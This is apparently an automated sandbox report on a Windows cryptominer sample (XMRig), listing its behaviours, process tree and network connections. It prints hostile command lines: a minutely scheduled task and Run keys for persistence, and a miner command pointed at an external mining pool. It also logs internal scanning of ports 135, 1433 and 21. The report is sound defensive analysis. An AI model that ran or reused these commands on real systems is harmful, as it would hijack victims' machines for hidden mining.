Malware Analysis Report

2025-01-06 20:27

Sample ID 240614-rzpvpsvcnh
Target 2cf24966a6aad7b6ecffe04a20eaf3dd.exe
SHA256 01c9940b468ce2a58f2bc52f5c8b7d0310451c994d798879ff653d92fbaf8719
Tags
xmrig miner persistence upx
score
10/10

Analysis Overview

score
10/10

SHA256

01c9940b468ce2a58f2bc52f5c8b7d0310451c994d798879ff653d92fbaf8719

Threat Level: Known bad

The file 2cf24966a6aad7b6ecffe04a20eaf3dd.exe was found to be: Known bad.

Malicious Activity Summary

xmrig miner persistence upx

xmrig

XMRig Miner payload

Executes dropped EXE

Loads dropped DLL

UPX packed file

Adds Run key to start application

Enumerates connected drives

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Program Files directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Checks processor information in registry

Creates scheduled task(s)

Gathers network information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-14 14:38

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 14:38

Reported

2024-06-14 14:40

Platform

win7-20240508-en

Max time kernel

150s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2cf24966a6aad7b6ecffe04a20eaf3dd.exe" C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2cf24966a6aad7b6ecffe04a20eaf3dd.exe" C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\webbase.xml C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3016 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 2168 wrote to memory of 2552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3016 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3016 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 3016 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 3016 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\SMB.exe
PID 3016 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 956 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3016 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 3016 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 2988 wrote to memory of 328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 3016 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe

"C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe /F

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ipconfig /flushdns

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /flushdns

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\ProgramData\SMB.exe

C:\ProgramData\SMB.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\cmd.exe

cmd /c ipconfig /flushdns

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /flushdns

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\cmd.exe

cmd /c ipconfig /flushdns

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /flushdns

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\system32\taskeng.exe

taskeng.exe {F27CB7D4-E33D-413A-9AB6-07C29C478ECE} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe

C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ipconfig /flushdns

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /flushdns

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\cmd.exe

cmd /c ipconfig /flushdns

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /flushdns

Network

Country Destination Domain Proto
US 8.8.8.8:53 nishabii.xyz udp
US 8.8.8.8:53 auto.c3pool.org udp
N/A 10.127.0.89:135 tcp
N/A 10.127.0.90:135 tcp
N/A 10.127.0.91:135 tcp
N/A 10.127.0.92:135 tcp
N/A 10.127.0.93:135 tcp
N/A 10.127.0.94:135 tcp
N/A 10.127.0.95:135 tcp
N/A 10.127.0.96:135 tcp
N/A 10.127.0.97:135 tcp
N/A 10.127.0.98:135 tcp
N/A 10.127.0.99:135 tcp
N/A 10.127.0.100:135 tcp
N/A 10.127.0.101:135 tcp
N/A 10.127.0.102:135 tcp
N/A 10.127.0.103:135 tcp
N/A 10.127.0.104:135 tcp
N/A 10.127.0.105:135 tcp
N/A 10.127.0.106:135 tcp
N/A 10.127.0.107:135 tcp
N/A 10.127.0.108:135 tcp
N/A 10.127.0.109:135 tcp
N/A 10.127.0.110:135 tcp
N/A 10.127.0.111:135 tcp
N/A 10.127.0.112:135 tcp
N/A 10.127.0.113:135 tcp
N/A 10.127.0.114:135 tcp
N/A 10.127.0.115:135 tcp
N/A 10.127.0.116:135 tcp
N/A 10.127.0.117:135 tcp
N/A 10.127.0.118:135 tcp
N/A 10.127.0.119:135 tcp
N/A 10.127.0.120:135 tcp
N/A 10.127.0.121:135 tcp
N/A 10.127.0.122:135 tcp
N/A 10.127.0.123:135 tcp
N/A 10.127.0.124:135 tcp
N/A 10.127.0.125:135 tcp
N/A 10.127.0.126:135 tcp
N/A 10.127.0.127:135 tcp
N/A 10.127.0.128:135 tcp
N/A 10.127.0.129:135 tcp
N/A 10.127.0.130:135 tcp
N/A 10.127.0.131:135 tcp
N/A 10.127.0.132:135 tcp
N/A 10.127.0.133:135 tcp
N/A 10.127.0.134:135 tcp
N/A 10.127.0.135:135 tcp
N/A 10.127.0.136:135 tcp
N/A 10.127.0.137:135 tcp
N/A 10.127.0.138:135 tcp
N/A 10.127.0.139:135 tcp
N/A 10.127.0.140:135 tcp
N/A 10.127.0.141:135 tcp
N/A 10.127.0.142:135 tcp
N/A 10.127.0.143:135 tcp
N/A 10.127.0.144:135 tcp
N/A 10.127.0.145:135 tcp
N/A 10.127.0.146:135 tcp
N/A 10.127.0.147:135 tcp
N/A 10.127.0.148:135 tcp
N/A 10.127.0.149:135 tcp
N/A 10.127.0.150:135 tcp
N/A 10.127.0.151:135 tcp
N/A 10.127.0.152:135 tcp
N/A 10.127.0.153:135 tcp
N/A 10.127.0.154:135 tcp
N/A 10.127.0.155:135 tcp
N/A 10.127.0.156:135 tcp
N/A 10.127.0.157:135 tcp
N/A 10.127.0.158:135 tcp
N/A 10.127.0.159:135 tcp
N/A 10.127.0.160:135 tcp
N/A 10.127.0.161:135 tcp
N/A 10.127.0.162:135 tcp
N/A 10.127.0.163:135 tcp
N/A 10.127.0.164:135 tcp
N/A 10.127.0.165:135 tcp
N/A 10.127.0.166:135 tcp
N/A 10.127.0.167:135 tcp
N/A 10.127.0.168:135 tcp
N/A 10.127.0.169:135 tcp
N/A 10.127.0.170:135 tcp
N/A 10.127.0.171:135 tcp
N/A 10.127.0.172:135 tcp
N/A 10.127.0.173:135 tcp
N/A 10.127.0.174:135 tcp
N/A 10.127.0.175:135 tcp
N/A 10.127.0.176:135 tcp
N/A 10.127.0.177:135 tcp
N/A 10.127.0.178:135 tcp
N/A 10.127.0.179:135 tcp
N/A 10.127.0.180:135 tcp
N/A 10.127.0.181:135 tcp
N/A 10.127.0.182:135 tcp
N/A 10.127.0.183:135 tcp
N/A 10.127.0.184:135 tcp
N/A 10.127.0.185:135 tcp
N/A 10.127.0.186:135 tcp
N/A 10.127.0.187:135 tcp
N/A 10.127.0.188:135 tcp
N/A 10.127.0.189:135 tcp
N/A 10.127.0.190:135 tcp
N/A 10.127.0.191:135 tcp
N/A 10.127.0.192:135 tcp
N/A 10.127.0.193:135 tcp
N/A 10.127.0.0:1433 tcp
N/A 10.127.0.194:135 tcp
N/A 10.127.0.195:135 tcp
N/A 10.127.0.1:1433 tcp
N/A 10.127.0.2:1433 tcp
N/A 10.127.0.196:135 tcp
N/A 10.127.0.197:135 tcp
N/A 10.127.0.3:1433 tcp
N/A 10.127.0.4:1433 tcp
N/A 10.127.0.198:135 tcp
N/A 10.127.0.199:135 tcp
N/A 10.127.0.5:1433 tcp
N/A 10.127.0.6:1433 tcp
N/A 10.127.0.200:135 tcp
N/A 10.127.0.201:135 tcp
N/A 10.127.0.7:1433 tcp
N/A 10.127.0.8:1433 tcp
N/A 10.127.0.202:135 tcp
N/A 10.127.0.203:135 tcp
N/A 10.127.0.9:1433 tcp
N/A 10.127.0.10:1433 tcp
N/A 10.127.0.204:135 tcp
N/A 10.127.0.205:135 tcp
N/A 10.127.0.11:1433 tcp
N/A 10.127.0.12:1433 tcp
N/A 10.127.0.206:135 tcp
N/A 10.127.0.13:1433 tcp
N/A 10.127.0.207:135 tcp
N/A 10.127.0.14:1433 tcp
N/A 10.127.0.208:135 tcp
N/A 10.127.0.209:135 tcp
N/A 10.127.0.15:1433 tcp
N/A 10.127.0.16:1433 tcp
N/A 10.127.0.17:1433 tcp
N/A 10.127.0.18:1433 tcp
N/A 10.127.0.210:135 tcp
N/A 10.127.0.211:135 tcp
N/A 10.127.0.212:135 tcp
N/A 10.127.0.19:1433 tcp
N/A 10.127.0.20:1433 tcp
N/A 10.127.0.213:135 tcp
N/A 10.127.0.214:135 tcp
N/A 10.127.0.21:1433 tcp
N/A 10.127.0.22:1433 tcp
N/A 10.127.0.215:135 tcp
N/A 10.127.0.23:1433 tcp
N/A 10.127.0.216:135 tcp
N/A 10.127.0.24:1433 tcp
N/A 10.127.0.217:135 tcp
N/A 10.127.0.218:135 tcp
N/A 10.127.0.25:1433 tcp
N/A 10.127.0.26:1433 tcp
N/A 10.127.0.219:135 tcp
N/A 10.127.0.27:1433 tcp
N/A 10.127.0.220:135 tcp
N/A 10.127.0.28:1433 tcp
N/A 10.127.0.221:135 tcp
N/A 10.127.0.222:135 tcp
N/A 10.127.0.29:1433 tcp
N/A 10.127.0.30:1433 tcp
N/A 10.127.0.223:135 tcp
N/A 10.127.0.224:135 tcp
N/A 10.127.0.31:1433 tcp
N/A 10.127.0.32:1433 tcp
N/A 10.127.0.225:135 tcp
N/A 10.127.0.226:135 tcp
N/A 10.127.0.33:1433 tcp
N/A 10.127.0.227:135 tcp
N/A 10.127.0.34:1433 tcp
N/A 10.127.0.35:1433 tcp
N/A 10.127.0.228:135 tcp
N/A 10.127.0.229:135 tcp
N/A 10.127.0.36:1433 tcp
N/A 10.127.0.37:1433 tcp
N/A 10.127.0.230:135 tcp
N/A 10.127.0.231:135 tcp
N/A 10.127.0.38:1433 tcp
N/A 10.127.0.232:135 tcp
N/A 10.127.0.39:1433 tcp
N/A 10.127.0.40:1433 tcp
N/A 10.127.0.233:135 tcp
N/A 10.127.0.41:1433 tcp
N/A 10.127.0.234:135 tcp
N/A 10.127.0.42:1433 tcp
N/A 10.127.0.235:135 tcp
N/A 10.127.0.43:1433 tcp
N/A 10.127.0.236:135 tcp
N/A 10.127.0.44:1433 tcp
N/A 10.127.0.237:135 tcp
N/A 10.127.0.45:1433 tcp
N/A 10.127.0.238:135 tcp
N/A 10.127.0.46:1433 tcp
N/A 10.127.0.239:135 tcp
N/A 10.127.0.47:1433 tcp
N/A 10.127.0.48:1433 tcp
N/A 10.127.0.50:1433 tcp
N/A 10.127.0.51:1433 tcp
N/A 10.127.0.240:135 tcp
N/A 10.127.0.52:1433 tcp
N/A 10.127.0.241:135 tcp
N/A 10.127.0.53:1433 tcp
N/A 10.127.0.242:135 tcp
N/A 10.127.0.243:135 tcp
N/A 10.127.0.54:1433 tcp
N/A 10.127.0.244:135 tcp
N/A 10.127.0.55:1433 tcp
N/A 10.127.0.56:1433 tcp
N/A 10.127.0.245:135 tcp
N/A 10.127.0.246:135 tcp
N/A 10.127.0.57:1433 tcp
N/A 10.127.0.58:1433 tcp
N/A 10.127.0.247:135 tcp
N/A 10.127.0.59:1433 tcp
N/A 10.127.0.248:135 tcp
N/A 10.127.0.60:1433 tcp
N/A 10.127.0.249:135 tcp
N/A 10.127.0.61:1433 tcp
N/A 10.127.0.250:135 tcp
N/A 10.127.0.62:1433 tcp
N/A 10.127.0.251:135 tcp
N/A 10.127.0.63:1433 tcp
N/A 10.127.0.252:135 tcp
N/A 10.127.0.64:1433 tcp
N/A 10.127.0.253:135 tcp
N/A 10.127.0.254:135 tcp
N/A 10.127.0.65:1433 tcp
N/A 10.127.0.66:1433 tcp
N/A 10.127.0.67:1433 tcp
N/A 10.127.0.68:1433 tcp
N/A 10.127.0.69:1433 tcp
N/A 10.127.0.70:1433 tcp
N/A 10.127.0.71:1433 tcp
N/A 10.127.0.72:1433 tcp
N/A 10.127.0.73:1433 tcp
N/A 10.127.0.74:1433 tcp
N/A 10.127.0.75:1433 tcp
N/A 10.127.0.76:1433 tcp
US 8.8.8.8:53 nishabii.xyz udp
N/A 10.127.0.77:1433 tcp
N/A 10.127.0.78:1433 tcp
N/A 10.127.0.79:1433 tcp
N/A 10.127.0.80:1433 tcp
N/A 10.127.0.81:1433 tcp
N/A 10.127.0.82:1433 tcp
N/A 10.127.0.83:1433 tcp
N/A 10.127.0.84:1433 tcp
N/A 10.127.0.85:1433 tcp
N/A 10.127.0.86:1433 tcp
N/A 10.127.0.87:1433 tcp
N/A 10.127.0.88:1433 tcp
N/A 10.127.0.89:1433 tcp
N/A 10.127.0.90:1433 tcp
N/A 10.127.0.91:1433 tcp
N/A 10.127.0.92:1433 tcp
N/A 10.127.0.93:1433 tcp
N/A 10.127.0.94:1433 tcp
N/A 10.127.0.95:1433 tcp
N/A 10.127.0.49:19490 tcp
N/A 10.127.0.96:1433 tcp
N/A 10.127.0.97:1433 tcp
N/A 10.127.0.98:1433 tcp
N/A 10.127.0.99:1433 tcp
N/A 10.127.0.100:1433 tcp
N/A 10.127.0.101:1433 tcp
N/A 10.127.0.102:1433 tcp
N/A 10.127.0.103:1433 tcp
N/A 10.127.0.104:1433 tcp
N/A 10.127.0.105:1433 tcp
N/A 10.127.0.106:1433 tcp
N/A 10.127.0.107:1433 tcp
N/A 10.127.0.108:1433 tcp
N/A 10.127.0.109:1433 tcp
N/A 10.127.0.110:1433 tcp
N/A 10.127.0.111:1433 tcp
N/A 10.127.0.112:1433 tcp
N/A 10.127.0.113:1433 tcp
N/A 10.127.0.114:1433 tcp
N/A 10.127.0.115:1433 tcp
N/A 10.127.0.116:1433 tcp
N/A 10.127.0.117:1433 tcp
N/A 10.127.0.118:1433 tcp
N/A 10.127.0.119:1433 tcp
N/A 10.127.0.120:1433 tcp
N/A 10.127.0.121:1433 tcp
N/A 10.127.0.122:1433 tcp
N/A 10.127.0.123:1433 tcp
N/A 10.127.0.124:1433 tcp
N/A 10.127.0.125:1433 tcp
N/A 10.127.0.126:1433 tcp
N/A 10.127.0.127:1433 tcp
N/A 10.127.0.128:1433 tcp
N/A 10.127.0.129:1433 tcp
N/A 10.127.0.130:1433 tcp
N/A 10.127.0.131:1433 tcp
N/A 10.127.0.132:1433 tcp
N/A 10.127.0.133:1433 tcp
N/A 10.127.0.134:1433 tcp
N/A 10.127.0.135:1433 tcp
N/A 10.127.0.136:1433 tcp
N/A 10.127.0.137:1433 tcp
N/A 10.127.0.138:1433 tcp
N/A 10.127.0.139:1433 tcp
N/A 10.127.0.140:1433 tcp
N/A 10.127.0.141:1433 tcp
N/A 10.127.0.142:1433 tcp
N/A 10.127.0.143:1433 tcp
N/A 10.127.0.144:1433 tcp
N/A 10.127.0.145:1433 tcp
N/A 10.127.0.146:1433 tcp
N/A 10.127.0.147:1433 tcp
N/A 10.127.0.148:1433 tcp
N/A 10.127.0.149:1433 tcp
N/A 10.127.0.150:1433 tcp
N/A 10.127.0.151:1433 tcp
N/A 10.127.0.152:1433 tcp
N/A 10.127.0.153:1433 tcp
N/A 10.127.0.154:1433 tcp
N/A 10.127.0.155:1433 tcp
N/A 10.127.0.156:1433 tcp
N/A 10.127.0.157:1433 tcp
N/A 10.127.0.158:1433 tcp
N/A 10.127.0.159:1433 tcp
N/A 10.127.0.160:1433 tcp
N/A 10.127.0.161:1433 tcp
N/A 10.127.0.162:1433 tcp
N/A 10.127.0.163:1433 tcp
N/A 10.127.0.164:1433 tcp
N/A 10.127.0.165:1433 tcp
N/A 10.127.0.166:1433 tcp
N/A 10.127.0.167:1433 tcp
N/A 10.127.0.168:1433 tcp
N/A 10.127.0.169:1433 tcp
N/A 10.127.0.170:1433 tcp
N/A 10.127.0.171:1433 tcp
N/A 10.127.0.172:1433 tcp
N/A 10.127.0.173:1433 tcp
N/A 10.127.0.174:1433 tcp
N/A 10.127.0.175:1433 tcp
N/A 10.127.0.176:1433 tcp
N/A 10.127.0.177:1433 tcp
N/A 10.127.0.178:1433 tcp
N/A 10.127.0.179:1433 tcp
N/A 10.127.0.180:1433 tcp
N/A 10.127.0.181:1433 tcp
N/A 10.127.0.182:1433 tcp
N/A 10.127.0.183:1433 tcp
N/A 10.127.0.184:1433 tcp
N/A 10.127.0.185:1433 tcp
N/A 10.127.0.186:1433 tcp
N/A 10.127.0.187:1433 tcp
N/A 10.127.0.188:1433 tcp
N/A 10.127.0.190:1433 tcp
N/A 10.127.0.189:1433 tcp
N/A 10.127.0.191:1433 tcp
N/A 10.127.0.192:1433 tcp
N/A 10.127.0.193:1433 tcp
N/A 10.127.0.0:21 tcp
N/A 10.127.0.194:1433 tcp
N/A 10.127.0.1:21 tcp
N/A 10.127.0.195:1433 tcp
N/A 10.127.0.2:21 tcp
N/A 10.127.0.196:1433 tcp
N/A 10.127.0.3:21 tcp
N/A 10.127.0.197:1433 tcp
N/A 10.127.0.4:21 tcp
N/A 10.127.0.198:1433 tcp
N/A 10.127.0.5:21 tcp
N/A 10.127.0.199:1433 tcp
N/A 10.127.0.6:21 tcp
N/A 10.127.0.200:1433 tcp
N/A 10.127.0.7:21 tcp
N/A 10.127.0.201:1433 tcp
N/A 10.127.0.8:21 tcp
N/A 10.127.0.202:1433 tcp
N/A 10.127.0.9:21 tcp
N/A 10.127.0.10:21 tcp
N/A 10.127.0.203:1433 tcp
N/A 10.127.0.204:1433 tcp
N/A 10.127.0.11:21 tcp
N/A 10.127.0.205:1433 tcp
N/A 10.127.0.12:21 tcp
N/A 10.127.0.206:1433 tcp
N/A 10.127.0.13:21 tcp
N/A 10.127.0.207:1433 tcp
N/A 10.127.0.14:21 tcp
N/A 10.127.0.208:1433 tcp
N/A 10.127.0.15:21 tcp
N/A 10.127.0.209:1433 tcp
N/A 10.127.0.16:21 tcp
N/A 10.127.0.17:21 tcp
N/A 10.127.0.18:21 tcp
N/A 10.127.0.211:1433 tcp
N/A 10.127.0.210:1433 tcp
N/A 10.127.0.19:21 tcp
N/A 10.127.0.212:1433 tcp
N/A 10.127.0.20:21 tcp
N/A 10.127.0.213:1433 tcp
N/A 10.127.0.21:21 tcp
N/A 10.127.0.214:1433 tcp
N/A 10.127.0.22:21 tcp
N/A 10.127.0.215:1433 tcp
N/A 10.127.0.23:21 tcp
N/A 10.127.0.24:21 tcp
N/A 10.127.0.216:1433 tcp
N/A 10.127.0.217:1433 tcp
N/A 10.127.0.25:21 tcp
N/A 10.127.0.26:21 tcp
N/A 10.127.0.218:1433 tcp
N/A 10.127.0.219:1433 tcp
N/A 10.127.0.27:21 tcp
N/A 10.127.0.220:1433 tcp
N/A 10.127.0.28:21 tcp
N/A 10.127.0.221:1433 tcp
N/A 10.127.0.29:21 tcp
N/A 10.127.0.222:1433 tcp
N/A 10.127.0.30:21 tcp
N/A 10.127.0.223:1433 tcp
N/A 10.127.0.31:21 tcp
N/A 10.127.0.224:1433 tcp
N/A 10.127.0.32:21 tcp
N/A 10.127.0.225:1433 tcp
N/A 10.127.0.33:21 tcp
N/A 10.127.0.226:1433 tcp
N/A 10.127.0.34:21 tcp
N/A 10.127.0.227:1433 tcp
N/A 10.127.0.35:21 tcp
N/A 10.127.0.36:21 tcp
N/A 10.127.0.228:1433 tcp
N/A 10.127.0.229:1433 tcp
N/A 10.127.0.37:21 tcp
N/A 10.127.0.230:1433 tcp
N/A 10.127.0.38:21 tcp
N/A 10.127.0.231:1433 tcp
N/A 10.127.0.39:21 tcp
N/A 10.127.0.232:1433 tcp
N/A 10.127.0.40:21 tcp
N/A 10.127.0.233:1433 tcp
N/A 10.127.0.41:21 tcp
N/A 10.127.0.42:21 tcp
N/A 10.127.0.234:1433 tcp
N/A 10.127.0.235:1433 tcp
N/A 10.127.0.43:21 tcp
N/A 10.127.0.236:1433 tcp
N/A 10.127.0.44:21 tcp
N/A 10.127.0.237:1433 tcp
N/A 10.127.0.45:21 tcp
N/A 10.127.0.238:1433 tcp
N/A 10.127.0.46:21 tcp
N/A 10.127.0.239:1433 tcp
N/A 10.127.0.47:21 tcp
N/A 10.127.0.48:21 tcp
N/A 10.127.0.50:21 tcp
N/A 10.127.0.51:21 tcp
N/A 10.127.0.52:21 tcp
N/A 10.127.0.240:1433 tcp
N/A 10.127.0.241:1433 tcp
N/A 10.127.0.53:21 tcp
N/A 10.127.0.242:1433 tcp
N/A 10.127.0.54:21 tcp
N/A 10.127.0.243:1433 tcp
N/A 10.127.0.55:21 tcp
N/A 10.127.0.244:1433 tcp
N/A 10.127.0.56:21 tcp
N/A 10.127.0.245:1433 tcp
N/A 10.127.0.57:21 tcp
